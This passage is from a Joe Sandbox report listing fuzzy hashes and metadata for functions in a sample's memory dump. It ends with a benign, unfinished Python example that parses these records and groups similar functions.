                                                                                                                                                                                                                              • Instruction ID: 3696f2d93929fa46188c6987e7804ac8aa03dd0ba677386b127873c8555e5986
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EBE1B672A0864282FBA8EE35C15023DB3A0FF65B48F944177DA0E07798DF39E952C712
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                              • API String ID: 0-900081337
                                                                                                                                                                                                                              • Opcode ID: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                              • Instruction ID: 6e706e2bade23511861509a906a967b1956bd1ac87c0e7589d60ab1ff3dd8644
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e7bac63e97a7e962ac1d8bc37368dc0e110af78d4507200a91f80e7c7b94e68
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E91C772A082C68BF7A4DE14D4D8B7E7BAAFF44348F81417ADA4A467D4CB38E540CB11
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                                              • API String ID: 0-3030954782
                                                                                                                                                                                                                              • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                              • Instruction ID: e245cbc019858674186d0360c6bfc66857120ca6ce51eb376c3a2a1a4ba53a43
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6516662B1C2C186F725DE359800769EB91EB64B94F888272CB9C4BAD9CF3DD140C712
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1010374628-0
                                                                                                                                                                                                                              • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction ID: cdd0afa5b468f91b07516e6c6a2fdce5705423b6c95e49c416963134618f2f9a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC02B121A1D64B41FA65FB219800379E7A4EF41BA0FC646B7DD5D463DAEE3CA841C332
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction ID: da7f1efeca77a8275ab10fd1b3443014dfc5de6b70c72353e6d56d395ab6f6d8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBA14662A0878A46FB21DF35A4407A9BB91EF64B84F448072DACD47789DF3DE402C712
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                              • Instruction ID: 0df8382ff43cd2b49cbd3379fb6a57b6c22915055fd50abac695394b3d996ae1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68517111F0864241FA64FA3665113BED3A0EF64BD4FD844F6DD0E4779AEE3CE4518222
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
• Instruction ID: 081584fd5c9040c0234fdc711a76a8b0c4ea278e15b8e7a97f2faa4b832bfc70
• Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
• Instruction Fuzzy Hash: F2B09220E07B02C2FE08BB256CC231863A8FF58700FD801BAC05C40334DE3C20E59722
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
• Instruction ID: 1bc4950147f317979ec7c6de8d4d0aeeac6e7f572aacd8585e95d11ff51e033b
• Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
• Instruction Fuzzy Hash: D2D1D666A0864286FBA8EF39804037DB7A0EF65B48F940276CE1D077D9DF39D845C762
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
• Instruction ID: dea04e26b7216c672dbbcab8593c8a1116e0aebcda015d8e5d518e39a33d9ccf
• Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
• Instruction Fuzzy Hash: 30C1AE722181E08BD289EB29E4A94BA73D1F78930DBD5407BEF8747789C63CA414DB21
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
• Instruction ID: eac9839e9d20f349cfcc6ded133971b43896407cb63281162f2c77a7100ab73d
• Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
• Instruction Fuzzy Hash: 43B18A76A0878585F764DF39C05023CBBA4EB69F48FA801B6CA4E47399CF3AD441C766
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
• Instruction ID: 90e62ba1304c8be173760bd401c62751ad2d613a39ec0c77eb87bc88c6d61eba
• Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
• Instruction Fuzzy Hash: 1181F372A0C38146F774DB29A44037AEB95FBA5794F804276DA9D43B9DDF3CE4408B12
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
• Instruction ID: 082136a70e7903f4c3a8682000dd71007942cbd6d5129c3c467b49d86e6d7b13
• Opcode Fuzzy Hash: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
• Instruction Fuzzy Hash: 5161B222A0C39246F764EA78945077DA781EB50760F9402FBD66DC26CDDE7DE841C732
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction ID: 16dbd852715bcebcfdd48fe17837e07ca23cc9556ef3dedd4edb14e3168e1751
• Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
• Instruction Fuzzy Hash: 3F517E76A1865186F724DB39C44036CB3A1FB68B68F684176CA8D07798CB3BE893C751
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction ID: 241f4a17f350fd7e56111b3c09864cd26ec5eaafd4f005833dd381e73bdf3e6c
• Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
• Instruction Fuzzy Hash: 0751D232A18A5182F724DB39D040338B7B0EB64B68F64417AEE9D07798DB3AED43C751
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 0a41bea0c6a733defe538892283327f7925893b58a0c73e4226c70ef59918292
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: D9519176A1865182F724DB39C040768B3A0EB65F68F64417AEE4D077D8CB3AEC53C791
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: d38823af9140b0018e3be40f5342f5328de4b1921e4888a7deaccc45ba41ed1b
• Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction Fuzzy Hash: 7D51B076A1865182F724DF38D084328A7A1EB65F58FA441B6EA4C07798DB3AEC83C751
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: b62139e90bd44764f5c78b3d91e8174d14e748511174ce1d00d58aa367d7413d
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: C251BE36A1865586F724DB39C040338A3A0EB64B58FA44176EE4C177ADDB3AEC43C791
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: 888479a8c5a45c3194ae0d153e6942be5298b09fbc6c1f0a3baa44b539b8b920
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 2C518136A1865186F724DB39C040378A7A1EB65B58FA88176EE4C1779CCF3AEC42C791
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508163789.00007FF7EAD2B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508393462.00007FF7EAD42000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1508507343.00007FF7EAD44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction ID: ecf3bb13c0e64aa6568933883de90c4a9628dfd207f523030017bf4d02c81ec3
• Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction Fuzzy Hash: C541A066C0D74A05F9A9D9380508BB4A780DF32BA0ED816FADD9D173CBC93D6596C322
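The function records above are all lifted from the same memory dump and carry no API or string matches, so the instruction fuzzy hash is the only field left for relating them. The script below is an added example, not Joe Sandbox code: it parses records in the report's own layout (the sample is constructed from four of the records above, with the page's padding and link text removed), confirms that every record points at the same source dump, and groups functions whose instruction fuzzy hashes are close. The closeness measure, a count of differing hex digits with an arbitrary cut-off of 30 out of 70, is this example's own heuristic; the page does not document how Joe Sandbox compares these hashes, and the function `group_by_instruction_hash` and its threshold are assumptions of the example.

```python
"""Parse Joe Sandbox function-similarity records and group them by fuzzy hash.
Added example, not Joe Sandbox code. The nibble-Hamming distance used below is
this example's own heuristic, not the metric Joe Sandbox applies."""
import re
from dataclasses import dataclass
from itertools import combinations

# One record in the report's own layout, constructed from the records above;
# only the per-function hashes vary between records in this sample.
RECORD_TEMPLATE = """\
Memory Dump Source
• Source File: 00000000.00000002.1508044753.00007FF7EAD01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EAD00000, based on PE: true
• Associated: 00000000.00000002.1507912306.00007FF7EAD00000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ead00000_SecuriteInfo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: {opcode}
• Instruction ID: {instr}
• Opcode Fuzzy Hash: {opcode}
• Instruction Fuzzy Hash: {fuzzy}
"""
# (Opcode ID, Instruction ID, Instruction Fuzzy Hash) of four functions from the
# report; the last one is the visibly dissimilar C541A066... function.
SAMPLE_FUNCTIONS = [
    ("8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447",
     "16dbd852715bcebcfdd48fe17837e07ca23cc9556ef3dedd4edb14e3168e1751",
     "3F517E76A1865186F724DB39C44036CB3A1FB68B68F684176CA8D07798CB3BE893C751"),
    ("68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98",
     "241f4a17f350fd7e56111b3c09864cd26ec5eaafd4f005833dd381e73bdf3e6c",
     "0751D232A18A5182F724DB39D040338B7B0EB64B68F64417AEE9D07798DB3AED43C751"),
    ("27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807",
     "0a41bea0c6a733defe538892283327f7925893b58a0c73e4226c70ef59918292",
     "D9519176A1865182F724DB39C040768B3A0EB65F68F64417AEE4D077D8CB3AEC53C791"),
    ("dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00",
     "ecf3bb13c0e64aa6568933883de90c4a9628dfd207f523030017bf4d02c81ec3",
     "C541A066C0D74A05F9A9D9380508BB4A780DF32BA0ED816FADD9D173CBC93D6596C322"),
]
SAMPLE_REPORT = "".join(RECORD_TEMPLATE.format(opcode=o, instr=i, fuzzy=f)
                        for o, i, f in SAMPLE_FUNCTIONS)
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(r"^(\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")

@dataclass
class FunctionRecord:
    source_file: str
    offset: str
    associated: list
    opcode_id: str
    instruction_id: str
    opcode_fuzzy: str
    instruction_fuzzy: str

def parse_records(text):
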